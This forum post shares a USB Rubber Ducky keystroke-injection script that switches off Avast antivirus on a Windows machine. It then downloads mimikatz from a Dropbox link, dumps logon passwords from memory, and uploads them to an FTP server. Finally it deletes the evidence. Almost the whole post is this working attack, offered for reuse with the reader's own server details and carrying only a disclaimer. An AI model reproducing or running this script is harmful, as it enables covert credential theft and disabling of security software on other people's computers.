Jump to content

USB rubber ducky turn off avast, run mimikatz and upload passwords

kirito

By kirito
in Classic USB Rubber Ducky

 Share

Recommended Posts

kirito Newbie

kirito

Posted
Posted

I wrote this script for my usb rubber ducky since i couldn't find any other working scripts to turn off avast etc.

The script turns off avast, downloads and executes mimikatz then uploads passwords to an ftp server. You do

need to customise it for your own ftp server and possibly the location of AvastUI.exe.

So here's the code :) :

REM This is a rough version of usb rubber ducky code to disable REM avast, download mimikatz, and upload the password text file REM to an ftp server, feel free to make changes, this is a rough
REM guidline :)
DELAY 2000
WINDOWS r
DELAY 400
REM You may need to change this to a different location
STRING "C:\Program Files\AVAST Software\Avast\AvastUI.exe"
ENTER
DELAY 2000
REM this is going to settings
DOWNARROW
DELAY 100
DOWNARROW
DELAY 100
DOWNARROW
DELAY 100
DOWNARROW
DELAY 100
DOWNARROW
DELAY 100
DOWNARROW
DELAY 100
DOWNARROW
DELAY 100
DOWNARROW
DELAY 100
REM should be over settings
ENTER
DELAY 100
DOWNARROW
DELAY 300
RIGHTARROW
DELAY 200
RIGHTARROW
DELAY 200
ENTER
DELAY 350
DOWNARROW
DELAY 100
ENTER
DELAY 100
ALT y
DELAY 100
ALT F4
DELAY 500
ALT F4
REM mimikatz ducky script to dump local wdigest passwords from memory using mimikatz (local user needs to be an administrator/have admin privs)
DELAY 3000
CONTROL ESCAPE
DELAY 1000
STRING cmd
DELAY 1000
CTRL-SHIFT ENTER
DELAY 1000
ALT y
DELAY 300
ENTER
STRING powershell (new-object System.Net.WebClient).DownloadFile('https://www.dropbox.com/s/retct66be69wwqm/mimikatz.exe?dl=1,%TEMP%\mimikatz.exe')
REM <THIS IS MIMIKATZ I TAKE NO RESPONSIBILITY FOR ANYONES
REM ACTIONS WITH THIS TOOl>
DELAY 300
ENTER
DELAY 3000
STRING %TEMP%\mimikatz.exe
DELAY 300
ENTER
DELAY 3000
STRING privilege::debug
DELAY 300
ENTER
DELAY 1000
STRING sekurlsa::logonPasswords full
DELAY 300
ENTER
DELAY 1000
STRING exit
DELAY 300
ENTER
DELAY 100
STRING del %TEMP%\mimikatz.exe
DELAY 300
ENTER
DELAY 200
STRING exit
DELAY 600
ALT SPACE
DELAY 400
STRING e
DELAY 400
STRING s
DELAY 200
ENTER
DELAY 500
WINDOWS r
DELAY 350
STRING notepad
DELAY 200
ENTER
CONTROL v
DELAY 600
CONTROL s
STRING %USERPROFILE%\mimikatz.txt
ENTER
DELAY 500
ALT F4
DELAY 500
WINDOWS r
DELAY 300
STRING cmd
DELAY 100
ENTER
DELAY 600
STRING cd %USERPROFILE%
STRING ftp <YOUR FTP SERVER>
ENTER
DELAY 500
STRING <YOUR USERNAME>
ENTER
DELAY 500
STRING <YOUR PASSWORD>
ENTER
DELAY 800
STRING put mimikatz.txt
ENTER
DELAY 600
STRING bye
ENTER
DELAY 700
STRING DEL /F /S /Q /A "mimikatz.txt"
ENTER
DELAY 300
ALT SPACE
DELAY 500
STRING c


Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...